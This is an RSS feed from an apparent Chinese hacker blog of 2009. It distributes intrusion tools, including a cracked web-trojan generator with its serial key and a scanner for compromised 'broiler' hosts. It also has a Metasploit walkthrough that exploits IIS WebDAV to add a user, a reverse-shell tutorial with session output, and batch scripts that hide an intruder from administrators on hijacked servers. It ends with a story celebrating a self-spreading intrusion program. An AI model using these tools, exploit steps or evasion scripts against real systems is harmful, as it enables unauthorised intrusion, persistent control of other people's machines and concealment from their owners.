<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[中国知音个人博客]]></title>
<link>http://www.bycnboy.com/</link>
<description><![CDATA[--如果真的聪明,把你的聪明用在人生的大智慧上,不要耍小聪明,这个才是大智慧!]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[lide8008@163.com([黑域特工])]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>中国知音个人博客</title>
	<url>http://www.bycnboy.com/images/logos.gif</url>
	<link>http://www.bycnboy.com/</link>
	<description>中国知音个人博客</description>
</image>

			<item>
			<link>http://www.bycnboy.com/article.asp?id=943</link>
			<title><![CDATA[[综合]  中国知音所有软件下载页面]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Mon,18 Feb 2109 09:50:12 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=943</guid>
		<description><![CDATA[<p style="text-align: center"><span style="color: #ff0000"><strong>[综合]&nbsp; 中国知音所有软件下载页面</strong></span></p>
<p style="text-align: center"><span style="color: #ff0000">打开页面：<a href="http://www.bycnboy.com/index.html">http://www.bycnboy.com/index.html</a></span></p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=986</link>
			<title><![CDATA[[原创作品] 多线程IP段端口扫描器(中国知音) CnboyPortScan.exe]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Wed,01 Jul 2009 02:55:59 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=986</guid>
		<description><![CDATA[<p style="text-align: center"><span style="color: #ff0000"><strong>[原创作品] 多线程IP段端口扫描器(中国知音) CnboyPortScan.exe</strong></span></p>
<p style="text-align: center"><span style="color: #ff0000"><img class="cursor_normal" style="width: 413px; height: 379px" src="http://p5.images22.51img1.com/6000/cnboy16/5c7a0492ec9a511fb9a95215d1e9351a.jpg" jquery1246387356239="21" alt="" /></span></p>
<p style="text-align: center"><span style="color: #ff0000">进入中国知音分流下载站下载：<a target="_blank" href="http://nihao33.ys168.com/">http://nihao33.ys168.com/</a> 密码：</span><span style="color: #0000ff">www.bycnboy.com</span></p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=985</link>
			<title><![CDATA[[破解分享] 牛牛网马生成器  [商业内部版]]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[分享资源]]]></category>
			<pubDate>Sun,28 Jun 2009 09:17:30 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=985</guid>
		<description><![CDATA[<p><img class="cursor_normal" style="width: 379px; height: 326px" src="http://p2.images22.51img1.com/6000/cnboy16/288bf89d6833054961eb510290148841.jpg" jquery1246151053712="21" alt="" /></p>
<p>系列号：BZ82H-QP2JW-KF6Z9-2HT5L<br />
<br />
下载地址：<a href="http://www.itenteam.net/cnboy/wm.rar">www.itenteam.net/cnboy/wm.rar</a></p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=984</link>
			<title><![CDATA[[原创]  指定IP入侵[语音教程]]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Tue,09 Jun 2009 17:25:07 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=984</guid>
		<description><![CDATA[<p style="text-align: center"><strong><span style="color: #ff0000">[原创]&nbsp; 指定IP入侵[语音教程]</span></strong></p>
<p style="text-align: center"><strong><span style="color: #ff0000"><img class="cursor_normal" style="width: 581px; height: 450px" src="http://p4.images22.51img1.com/6000/cnboy16/40a99e38ef7fb68b4f9f74c6974fc22d.png" jquery1245239746156="21" alt="" /></span></strong></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 作者：中国知音 <a href="http://www.bycnboy.com">www.bycnboy.com</a> QQ：27408826<br />
==========================================================================<br />
语音教程，请大家接上耳麦。<br />
<span style="color: #003300">工具：&nbsp;&nbsp; <br />
&nbsp;&nbsp;&nbsp; 1.Metasploit （外国人写的MSF）&nbsp;&nbsp;&nbsp; <br />
&nbsp;&nbsp;&nbsp; 2.CnBoyShellCmd.exe（中国知音MSF指定IP入侵Tool）-自己写的，方便自己用。<br />
IP：192.168.0.106 [演示入侵IP]<br />
本次入侵原理：溢出&rarr;反弹CmdSHell [简单实用的入侵方法 推荐大家掌握]<br />
不是100%的成功 但是 这毕竟是一个方法 所以大家一定好试试。<br />
</span>----------------------------------------------------------------<br />
反弹回来的cmdshell权限连接数。命令：sessions -l<br />
Active sessions<br />
===============<br />
&nbsp; Id&nbsp; Description&nbsp;&nbsp;&nbsp; Tunnel&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; --&nbsp; -----------&nbsp;&nbsp;&nbsp; ------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp; 1&nbsp;&nbsp; Command shell&nbsp; 192.168.0.101:6807 -&gt; 192.168.0.106:29429&nbsp; <br />
&nbsp; 2&nbsp;&nbsp; Command shell&nbsp; 192.168.0.101:7469 -&gt; 192.168.0.106:21469</p>
<p style="text-align: left"><span style="color: #ff0000"><strong>【推荐】下载：</strong></span><br />
&nbsp;&nbsp;&nbsp;&nbsp; <span style="color: #0000ff">Metasploit 3.2 (UNIX) </span>：<a href="http://spool.metasploit.com/releases/framework-3.2.tar.gz">http://spool.metasploit.com/releases/framework-3.2.tar.gz</a><br />
&nbsp;&nbsp;&nbsp;&nbsp; <span style="color: #0000ff">Metasploit 3.2 (WIN32)：</span><a href="http://spool.metasploit.com/releases/framework-3.2.exe">http://spool.metasploit.com/releases/framework-3.2.exe</a><br />
&nbsp;&nbsp;&nbsp;&nbsp; <span style="color: #00ff00">中国知音MSF指定IP入侵Tool(CnBoyShellCmd.exe):&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><a href="http://linshi.bycnboy.com/soft/cmdshell/cnboyshellcmd.rar">http://linshi.bycnboy.com/soft/cmdshell/cnboyshellcmd.rar</a><br />
&nbsp;&nbsp;&nbsp;&nbsp; 附语音教程：<a href="http://linshi.bycnboy.com/jc/cmdshell/cnboyshellcmd-jc.rar">http://linshi.bycnboy.com/jc/cmdshell/cnboyshellcmd-jc.rar</a><br />
&nbsp;</p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=983</link>
			<title><![CDATA[[原创] 中国知音解除3389终端限制连接工具]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Mon,08 Jun 2009 04:38:59 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=983</guid>
		<description><![CDATA[<p style="text-align: center"><strong><span style="color: #ff0000">[原创] 中国知音解除3389终端限制连接工具</span></strong></p>
<p style="text-align: left">说明：由于使用了3389登录服务器后没有及时注销或者其他情况而出现再次登陆时提示：终端服务器超出了最大允许连接数。解决这个现像的办法有好多，例如百度上说的，用组策略修改连接数上限，或是用复杂的cmd命令！但前提是一定要进入服务器才可以执行以上操作。下面给大家说一个可以在不进入服务器的情况下，强行登陆!当你服务器出现这样提示的时候你也不用再发愁重启服务器了</p>
<p style="text-align: left">-----------请使用：中国知音解除3389终端限制连接工具<br />
<img class="cursor_normal" style="width: 339px; height: 247px" src="http://pb.images22.51img1.com/6000/cnboy16/bed52f76417c68cbbbefcad2d669a555.jpg" jquery1244406911997="21" alt="" /><br />
&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: left"><span style="color: #ff0000">知音团Oday组织 QQ群:29413901<br />
&nbsp;<a href="http://www.bycnboy.com/cnboy/soft_cnboy/x-scan.html">http://www.bycnboy.com/cnboy/soft_cnboy/x-scan.html</a> <br />
下载地址：<a href="http://linshi.bycnboy.com/soft/mstsc/cnboymstsc.rar">http://linshi.bycnboy.com/soft/mstsc/cnboymstsc.rar</a></span></p>
<p style="text-align: left">&nbsp;</p>
<p style="text-align: left">&nbsp;</p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=982</link>
			<title><![CDATA[[原创] 中国知音 MSF指定IP入侵命令辅助器  Me  →Love Exp]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Fri,05 Jun 2009 15:25:23 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=982</guid>
		<description><![CDATA[<p style="text-align: center"><span style="color: #ff0000"><strong>[原创] 中国知音 MSF指定IP入侵命令辅助器&nbsp; Me&nbsp; &rarr;Love Exp</strong></span></p>
<p style="text-align: left"><span style="color: #ff0000">自己渗透时候 用到的！</span></p>
<p><img alt="" src="http://p8.images22.51img1.com/6000/cnboy16/814f58a2ab4c27e30d447d03bfe0dec9.jpg" /></p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=973</link>
			<title><![CDATA[[原创学习] 中国知音 CnBoy-Xscan  全自动扫肉鸡工具 皇冠[无限制测试版]]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Thu,04 Jun 2009 21:49:14 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=973</guid>
		<description><![CDATA[<p style="text-align: center"><strong><span style="color: #ff0000">[原创学习] 中国知音 CnBoy-Xscan&nbsp; 全自动扫肉鸡工具 皇冠[无限制测试版]</span></strong></p>
<p style="text-align: left"><span style="color: #ff0000"><strong><span style="color: #ff0000">下载地址：<a href="http://linshi.bycnboy.com/soft/xscan3.0[no]/CnBoy-Xscan3.0[no].rar">http://linshi.bycnboy.com/soft/xscan3.0[no]/CnBoy-Xscan3.0[no].rar</a></span></strong></span><span style="color: #ff0000"><img class="cursor_normal" style="width: 778px; height: 517px" alt="" jquery1243597753031="21" src="http://pa.images22.51img1.com/6000/cnboy16/a65fb3ec3877b3f4cee840e6508ce54b.jpg" /></span></p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=981</link>
			<title><![CDATA[[团队作品]  3389肉鸡服务器保护住手]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[原创作品]]]></category>
			<pubDate>Wed,03 Jun 2009 12:29:12 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=981</guid>
		<description><![CDATA[<p style="text-align: center"><span style="color: #ff0000"><strong>[知音团队作品]&nbsp; 3389肉鸡服务器保护住手&nbsp;</strong></span></p>
<p style="text-align: left">软件名称：[团队作品]&nbsp; 3389肉鸡服务器保护住手<br />
来源：中国知音 http://www.bycnboy.com/<br />
转载请注明，谢谢您的转载与支持！<br />
下载地址：<a href="http://linshi.bycnboy.com/soft/3389Logoff/www.bycnboy.com-3389logoff.rar">http://linshi.bycnboy.com/soft/3389Logoff/www.bycnboy.com-3389logoff.rar</a></p>
<p style="text-align: center"><img alt="" src="http://pa.images22.51img1.com/6000/cnboy16/a75900215a711b5f0519ceba159723cb.jpg" /></p>
<p style="text-align: center">&nbsp;</p>
<p style="text-align: left">根据此内容编写：</p>
<p style="text-align: left">&nbsp;当渗透中实时检管理员的 bat <br />
- -! 来了TOOLS 这么久还没写过东西现在给大家贡献点东西</p>
<p style="text-align: left">当你在渗透中挂机嗅探的时候，如果管理员上来发现就不好了所以有了这个bat 的用处 <br />
检测管理员上线注销自已的 bat <br />
copy 保存为 xx.bat <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; @echo off <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :check <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; choice /C YN /T 10 /D Y <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; quser | find &quot;#16&quot; &amp;&amp; del xx.bat | logoff <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; goto check <br />
说明一下 <br />
#16 每次运行这个 bat 的时候先quser 一下，看当前的会话id 是多少，然后加1 每连接一次就会加1 <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 用户名 会话名 ID 状态 空闲时间 登录时间 <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; administrator rdp-tcp#22 2 运行中 . 2009-4-16 19:24</p>
<p style="text-align: left">你要把这个给改成 #23 就可以了 然后下一个连接进来的时候就会注销自已</p>
<p style="text-align: left">哪位牛帮忙改一下，判断 如果 比 rdp-tcp#22 大的连接进来的话就注销自已 <br />
choice /C YN /T 10 /D Y <br />
/T 10 是 10 秒一检测 这样是为了不太占CPU <br />
by dh <br />
为了渗透的方便，顺便帖上一个很淫的人写的一个 bat 方便大家 <br />
嗅探中当机的一点点启示 <br />
by chong <br />
很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊..... <br />
当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗. <br />
这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好吧. <br />
如果还是不小心挂了呢. <br />
没事.这里为您准备了一个BAT 在开嗅的时候运行它就行了哦. <br />
======start========= <br />
:ping <br />
choice /C YN /T 120 /D Y <br />
ping g.cn <br />
IF ERRORLEVEL 1 GOTO reboot <br />
IF ERRORLEVEL 0 GOTO ping <br />
:reboot <br />
shutdown /r /t 0 <br />
======end========= <br />
这里的g.cn你可以设置为网关的IP或你的IP <br />
如果能ping通的话就继续ping 如果不通的话就认为当机了 (当然.你要事先测试下) <br />
那.就重启罗. 或自己写一些语句 像结束cain等.自由发挥 <br />
&nbsp;</p>
<p style="text-align: left">&nbsp;</p>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=980</link>
			<title><![CDATA[[黑客必备]   Metasploit -中国知音推荐]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[技术讨论]]]></category>
			<pubDate>Mon,01 Jun 2009 16:05:15 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=980</guid>
		<description><![CDATA[<p style="text-align: center"><span style="color: #ff0000"><strong>[黑客必备]&nbsp;&nbsp; Metasploit -中国知音推荐</strong></span></p>
<div class="cnt" id="blog_text">
<p><span class="tpc_content">Metasploit 是个好东西，实在想不到别的办法了，或许这东西能帮你一下，Metasploit包含了众多exploit，说不准还能用上几个，搞几台好肉鸡. <br />
下载Metasploit双击进行安装，非常简单，一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat和msfweb.bat,第一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用方法,运行后我们看到的是metasploit的欢迎界面，输入&ldquo;？&rdquo;查看帮助，<br />
</span><span class="tpc_content">如图1 </span></p>
<span class="tpc_content">
<div forimg="1">
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/24d4417faeecef0128388ab4.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">&nbsp;</div>
</div>
<p>看到很多命令吧，我们来解释一下 <br />
&ldquo;？&rdquo; 帮助 <br />
&ldquo;cd&rdquo; :这个命令大家都熟悉，和WIN下面一样，切换目录 <br />
&ldquo;exit&rdquo; 这个就是退出的意思 <br />
&ldquo;info&rdquo;显示当前程序信息 <br />
&ldquo;quit&rdquo;退出程序 <br />
&ldquo;reload&rdquo;加载exploit和payloads <br />
&ldquo;save&rdquo;保存设置 <br />
&ldquo;setg&rdquo;设置一个环境变量 <br />
&ldquo;show&rdquo;显示当前可用的exploit <br />
&ldquo; use&rdquo;选择一个exp <br />
&ldquo;version&rdquo;显示程序版本 <br />
这么多命令看起来肯定有些晕了吧其实用到的就&quot;show&quot; &quot;info&quot; &quot;use&quot;这3个，我们来看看是怎么使用的 <br />
这个程序就是一个大的工具包，集成了N多EXPLOIT,我们可以用show exploits看看有哪些exploit程序,如图2</p>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/5bdeb70067652518728b65b5.jpg" border="0" small="0" alt="" /></div>
<p>看到了吧？这么多溢出程序，想用哪个就用哪个，省得整天找。这么多的东西该怎么用呢？？比如我想用一个溢出程序，肯定得先看他的帮助了解使用方法。这就得用到info命令啦。这个命令就是显示溢出程序的详细信息，比如我们想看下iis50_webdav_ntdll这个溢出程序的用法,就在命令行下输入info exploit iis50_webdav_ntdll,就会看到图3所示</p>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/a944941fe0cf836af624e4b7.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">这里只是查看Exploit的信息，我们还可查看shellcode的信息。在这个工具包中，可以定义自己需要的shellcode.在命令行下输入&quot;show payloads&quot;可以看到可用的shellcode列表，如图4</div>
<div class="tmpDiv">&nbsp;</div>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/0e363f823a7038ab0cf4d2b0.jpg" border="0" small="0" alt="" /></div>
<div forimg="1">&nbsp;</div>
<div forimg="1">&nbsp;</div>
<div class="tmpDiv">左边是名字，右边是说明。我们可以用info命令查看shellcode的具体信息，输入命令info payload cmd_generic如图5 <br />
<img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/144725a99aef27f51e17a2b2.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">这里要注意的只是required和options,这里required表示必选 options 表示可选可不选，以linux开头的就是针对linux系统的shellcode，以CMD和WIN开头的就是针对所有WIN系统。在溢出过程中一定要选对应的SHELLCODE才能成功。 <br />
好，现在我们来看实战一下，我们拿webdav的溢出程序做例子,在命令中输入use iis50_webdav_ntdll,然后再输入show options 查看要输入的内容，如图6</div>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/ac2624a7dbff209cd14358bc.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">然后我们在命令行下输入set rhost 192.168.1.223 set rhost 80 如图7</div>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/070d2dfbf720436d034f56bd.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">到这里了，得指定shellcode，输入以下命令：set payload winexec输完了按回车然后再输入set cmd net user hack520 /add 如图8</div>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/50dcd28f209a7ce7f01f36bf.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">好了现在可以向192.168.1.223发起进攻了，输入show targets 可以看到操作系统的代号，大家都知道webdav走针对2000系统，输入 set targets 0 如图9</div>
<div forimg="1"><img class="blogimg" src="http://hiphotos.baidu.com/%5F%D0%A1%B2%DD%D2%B2%B7%E8%BF%F1/pic/item/6fbd0a8144c5f1d1bc3e1eb8.jpg" border="0" small="0" alt="" /></div>
<div class="tmpDiv">没有什么问题了就输入Exploit。如果对方服务器存在这个漏洞话就会得到shell了</div>
<div class="tmpDiv"><span class="tpc_content"><strong>Metasploit下载：</strong></span></div>
<div class="tmpDiv">&nbsp;</div>
<div class="tmpDiv"><span class="tpc_content"><a href="http://www.metasploit.com/tools/framework-2.7.exe">http://www.metasploit.com/tools/framework-2.7.exe</a><br />
</span></div>
<div class="tmpDiv">&nbsp;</div>
<div class="tmpDiv"><span class="tpc_content"><a href="http://www.securitycode.cn/framework-3.0.exe" target="_blank">http://www.securitycode.cn/framework-3.0.exe</a></span></div>
<div class="tmpDiv"><strong><br />
图形界面下使用Metasploit<br />
</strong>&nbsp;&nbsp;&nbsp;&nbsp; Metasploit图形界面的使用方法和命令行下没有太大的区别，只不过是操作方式的不同罢了：到Metasploit的安装目录下找到Msfweb.bat文件双击运行，一会后程序提示执行成功，如图10所示：<br />
<p align="center"><img src="http://img.zol.com.cn/article/3/939/lihgtRzUGT7E.gif" border="0" alt="" /><br />
<br />
图10</p>
然后打开IE，在地址栏中输入<a href="http://127.0.0.1:55555/" target="_blank">http://127.0.0.1:55555</a>等一会后看到图11所示的IE窗口：<br />
<p align="center"><img src="http://img.zol.com.cn/article/3/940/li9wFzEEdoHTo.gif" border="0" alt="" /><br />
<br />
图11</p>
在想要使用的溢出工具包上单击鼠标左键后进入到基本设置窗口，我们仍然以iis50_webdav_ntdll为例，如图12所示：<br />
<p align="center"><img src="http://img.zol.com.cn/article/3/941/liOcEFkTvJ72g.gif" border="0" alt="" /><br />
<br />
图12</p>
单击&ldquo;select payload&rdquo;选项进入Payload选择界面，如图13所示：<br />
<p align="center"><img src="http://img.zol.com.cn/article/3/942/lilUFkEVY1I4c.gif" border="0" alt="" /></p>
<br />
图13<br />
选择合适的Payload后就进入基本信息的设定界面了，如图14所示：<br />
<p align="center"><img src="http://img.zol.com.cn/article/3/943/li5Et4E9nA86.gif" border="0" alt="" /><br />
<br />
图14</p>
这里的设置和命令行中介绍的是基本一致的，我就不做额外的说明了。都设定好后，你可以点Vulnerability Check检查看看目标系统有没有相应的漏洞，或者点Launch Exploit进行攻击！<br />
从上面的操作可以看出Metasploit的使用方法是非常简单的，而且功能也是很强大的，对于我们日常的渗透来说是一款很实用的工具。当然，你也许并不满足于软件自带的这些溢出工具，你完全可以自己向这个工具中添加任何你认为对你有用的溢出工具包。相信随着大家的努力，这个工具包可以更加完善！</div>
</span></div>]]></description>
		</item>
		
			<item>
			<link>http://www.bycnboy.com/article.asp?id=979</link>
			<title><![CDATA[[黑客] 最后的入侵 【一个感人的黑客爱情故事】]]></title>
			<author>lide8008@163.com(中国知音)</author>
			<category><![CDATA[[分享资源]]]></category>
			<pubDate>Sat,30 May 2009 00:50:51 +0800</pubDate>
			<guid>http://www.bycnboy.com/default.asp?id=979</guid>
		<description><![CDATA[<p style="text-align: center"><strong><span style="color: #ff0000">[黑客] 最后的入侵 【一个感人的黑客爱情故事】</span></strong></p>
<p style="text-align: left">一生命是由无数个巧合加上无数次的错误组成的，不相交的路程或许会在某一个时刻变成统一的线路，可惜，结果不一定圆满，故事，才刚刚开始&hellip;&hellip;</p>
<p style="text-align: left"><br />
一</p>
<p style="text-align: left">男孩&mdash;&mdash;请允许我这样称呼这个已经20岁善良而内向的小伙子&mdash;&mdash;一个黑客。黑客也是人，一名怎样的黑客取决于他是怎样的一个人。如果说因为性格内向和对技术本身的热爱让男孩成了一名黑客，那么男孩的善良则决定了他是一个遵守黑客守则的黑客：他总是会在找到漏洞之后，通知相关的人进行修补。</p>
<p style="text-align: left">是的，提到一个次：善良。在这样的一个时代，这种东西几乎成了一个中性甚至是贬义的词，听到后马上让人想到的是&mdash;&mdash;懦弱或者苍白&mdash;&mdash;可我实在找不出更恰当的词语来形容这个男孩，似乎只有善良，才能准确表达出那种印象。就像描述对大海的印象时，最经典的话总是说：&ldquo;都是水！&rdquo;</p>
<p style="text-align: left">一次，利用一个漏洞他很轻易侵入了一台PC，像往常的做法一样，他在PC的桌面留了一个文本，告诉对方存在的漏洞以及修补方法。不过，当他过几天再去检查那台PC的时候，发现漏洞依然没有堵，他当初的那个文本也还留在桌面上。惟一的不同是，文本后面有了一段PC主人的回复：&ldquo;你说的那种补漏洞的东西是不是一种胶布的品牌啊，我去超市怎么买不到呢？&rdquo;&hellip;&hellip;男孩笑了。</p>
<p style="text-align: left"><br />
二</p>
<p style="text-align: left">男孩入侵的那台PC的主人是一个女孩。</p>
<p style="text-align: left">两个人利用电脑桌面上那个文本开始彼此的交流。这该是多么浪漫的一件事情：两 个文本毫不相干的人开始通过一个文本&mdash;&mdash;也仅仅通过一个文本&mdash;&mdash;开始了交流，从陌生到熟悉，甚至有了只属于彼此的一些词语和秘密&mdash;&mdash;在想爱、想被爱的时候遇到一个同样一个想爱、想被爱的人，爱情就是这么简单的事。</p>
<p style="text-align: left">男孩和女孩同样也遇到了这件&ldquo;简单&rdquo;的事情，惟一不同的是他们都不曾告诉对方，只是默默。对啊，这本来便是一份柏拉图式爱情，也许本便就是不需要表白，更何况，这是一个内向的男孩和一个天性害羞的女孩。</p>
<p style="text-align: left">当那个文本快100K了，女孩问：&ldquo;如果换了一个人在用我的电脑，在这个文件上留言，你能知道那不是我吗？&rdquo;</p>
<p style="text-align: left">男孩说：&ldquo;能。只有你才是你，我可以感觉到。&rdquo;</p>
<p style="text-align: left">女孩终于又说：&ldquo;我发现，我喜欢*了。&rdquo;</p>
<p style="text-align: left">男孩犹豫良久：&ldquo;我们只是朋友。&rdquo;</p>
<p style="text-align: left">男孩也不知道自己为什么要撒谎，几个声音同时在脑子里回荡&mdash;&mdash;而女孩的问，在经历了风雨后回首看来是那样的明晰！</p>
<p style="text-align: left"><br />
三</p>
<p style="text-align: left">女孩搬家了！而且换了一台电脑，但女孩没有告诉男孩。搬家，换电脑，这本来是一件很平常的事情，但对那个时候的男孩和女孩来说，却意味着失去联络&mdash;&mdash;请不要去责怪女孩，女孩把那个文本拷到了新电脑的桌面上，她以为那样，男孩就还能找到这台电脑，还能继续和她说话。</p>
<p style="text-align: left">当连续好几天男孩没有在文本上留言的时候，女孩真的着急了。女孩甚至整天开着电脑，等男孩来，在文本上跟她说话。</p>
<p style="text-align: left">可惜&hellip;&hellip;男孩一直没有来&hellip;&hellip;</p>
<p style="text-align: left">女孩终于明白她和男孩已经失去了联系，她甚至也去了解安全知识，和其它人不同的是，她是为了让自己的电脑更容易被入侵。她依然每天打天桌面上的文本，并在上面告诉男孩，自己一直在等他。她相信，男孩一定还能找到她的电脑。</p>
<p style="text-align: left">男孩发现那个IP段再也扫描不到女孩的电脑了。想起女孩偶然提起过一次不久会搬家，男孩把扫描的IP段扩大到所有可能的范围。他甚至放弃了他一直恪守的黑客守则，利用了他入侵了的近百台服务器不分日夜地起帮他扫描，他疯狂地要找到女孩。结果是那样的让人难以接受：他失败了！用千万次努力，也无法重现最初的一次偶然，这不得不让人想起一个字：缘！</p>
<p style="text-align: left">男孩意识到女孩换电脑或者重装系统了。他坚信，女孩电脑的桌面一定还保留着，于是他做出来一个比原来的扫描要疯狂几万倍的决定：入侵所有可能的电脑，直到找到女孩的电脑。</p>
<p style="text-align: left"><br />
四</p>
<p style="text-align: left">男孩的毅力让人惊叹，男孩的技术同样让人佩服得无话可说。他甚至写出一个自动入侵电脑并且自动传播的极为高超的程序，并通过搜索桌面是否有那个文本作为判断是否是女孩的电脑，如果找到则发一封EMAIL回来，并在女孩的电脑开一个后门以便男孩连接。半年后，当男孩从邮箱里面收到一封由自己程序发回来，报告女孩电脑已经找到的邮件时，然后连上了女孩的电脑。</p>
<p style="text-align: left">当他打开那个文本的时候，上帝啊，真的找不出什么词语来描述男孩此刻的心情，男孩不仅看到了女孩一直等待留下的呼喊，更看到了一个冒充自己的人，而女孩一直把他当作自己！生命的美妙和痛苦都来自转折，而这样的转折给男孩的只有一牌空白。</p>
<p style="text-align: left">男孩花了很长一段时间终于把他离开后的留言看完，心中的痛苦难以名状。男孩决定离开，因为他不想给女孩带来更多关于真假的困惑，因为他相信：冒充他的人最初也是好心的，更重要的是，他能看出，他们之间已经有感情，尽管彼此也还是没有说&mdash;&mdash;就像最初的男孩和女孩。</p>
<p style="text-align: left">通过刷新文本，男孩注意到女孩正在和那人说话。</p>
<p style="text-align: left">女孩说：&ldquo;我，发现，我真的很喜欢你。&rdquo;于是他迅速刷新文本，想知道那人会怎么回答。一切似乎都在重演半年多前的一幕：良久，那人终于打出几个字&ldquo;我们只是朋友&rdquo;,男孩快速的把那几个字删掉，然后写上&ldquo;我也很喜欢你&rdquo;，接着迅速保存，断线，离开了女孩的电脑。</p>
<p style="text-align: left">男孩久久的盯着屏幕.......此刻的脑海里想着他们.....</p>
<p style="text-align: left">男孩曾经错过，他不想让另一个男孩也错过，更不想女孩再一次失望。关于真与假，已经不再重要。</p>
<p style="text-align: left"><br />
五</p>
<p><span>
<p style="text-align: left">这是男孩作为黑客的最后一次入侵了，或许这样只是一种仪式，但在这段青涩的初恋面前，男孩把这个仪式进行得像一个虔诚的信徒&mdash;&mdash;超市买不到的胶布或许能再遇上，但是那已经是另外一块胶布，无法比较，因为一一在心中的分量已经改变了</p>
</span></p>
<p style="text-align: left">&nbsp;</p>]]></description>
		</item>
		
</channel>
</rss>
